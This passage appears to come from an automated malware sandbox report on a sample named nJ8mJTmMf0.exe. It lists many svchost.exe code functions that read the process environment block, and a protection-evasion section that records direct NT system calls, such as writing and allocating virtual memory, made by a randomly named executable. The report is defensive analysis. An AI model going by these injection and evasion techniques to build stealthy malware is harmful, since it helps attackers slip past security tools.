Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h] 1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h] 1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h] 1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h] 1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h] 1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h] 1_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h] 1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h] 1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h] 1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h] 1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h] 1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h] 1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h] 1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h] 1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h] 1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h] 1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h] 1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h] 1_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322645D mov eax, dword ptr fs:[00000030h] 1_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325245A mov eax, dword ptr fs:[00000030h] 1_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032364AB mov eax, dword ptr fs:[00000030h] 1_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h] 1_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h] 1_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h] 1_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h] 1_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h] 1_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h] 1_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h] 1_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h] 1_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304B00 mov eax, dword ptr fs:[00000030h] 1_2_03304B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h] 1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h] 1_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h] 1_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h] 1_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h] 1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h] 1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h] 1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h] 1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h] 1_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h] 1_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h] 1_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h] 1_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03228B50 mov eax, dword ptr fs:[00000030h] 1_2_03228B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h] 1_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h] 1_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h] 1_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h] 1_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h] 1_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h] 1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h] 1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h] 1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h] 1_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h] 1_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h] 1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h] 1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h] 1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h] 1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h] 1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h] 1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h] 1_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h] 1_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h] 1_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h] 1_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h] 1_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h] 1_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h] 1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h] 1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h] 1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h] 1_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h] 1_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h] 1_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h] 1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h] 1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h] 1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h] 1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h] 1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h] 1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h] 1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h] 1_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h] 1_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h] 1_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h] 1_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h] 1_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h] 1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h] 1_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h] 1_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h] 1_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h] 1_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h] 1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h] 1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h] 1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h] 1_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h] 1_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h] 1_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B892A mov eax, dword ptr fs:[00000030h] 1_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C892B mov eax, dword ptr fs:[00000030h] 1_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h] 1_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h] 1_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h] 1_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03228918 mov eax, dword ptr fs:[00000030h] 1_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03228918 mov eax, dword ptr fs:[00000030h] 1_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h] 1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h] 1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h] 1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0327096E mov eax, dword ptr fs:[00000030h] 1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0327096E mov edx, dword ptr fs:[00000030h] 1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0327096E mov eax, dword ptr fs:[00000030h] 1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h] 1_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h] 1_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h] 1_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h] 1_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03304940 mov eax, dword ptr fs:[00000030h] 1_2_03304940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h] 1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032309AD mov eax, dword ptr fs:[00000030h] 1_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032309AD mov eax, dword ptr fs:[00000030h] 1_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h] 1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h] 1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h] 1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h] 1_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h] 1_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h] 1_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h] 1_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h] 1_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h] 1_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h] 1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h] 1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h] 1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h] 1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h] 1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h] 1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h] 1_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D483A mov eax, dword ptr fs:[00000030h] 1_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D483A mov eax, dword ptr fs:[00000030h] 1_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h] 1_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h] 1_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h] 1_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h] 1_2_032C6870
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_006581F7
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062A364 SetUnhandledExceptionFilter, 0_2_0062A364
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0062A395

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
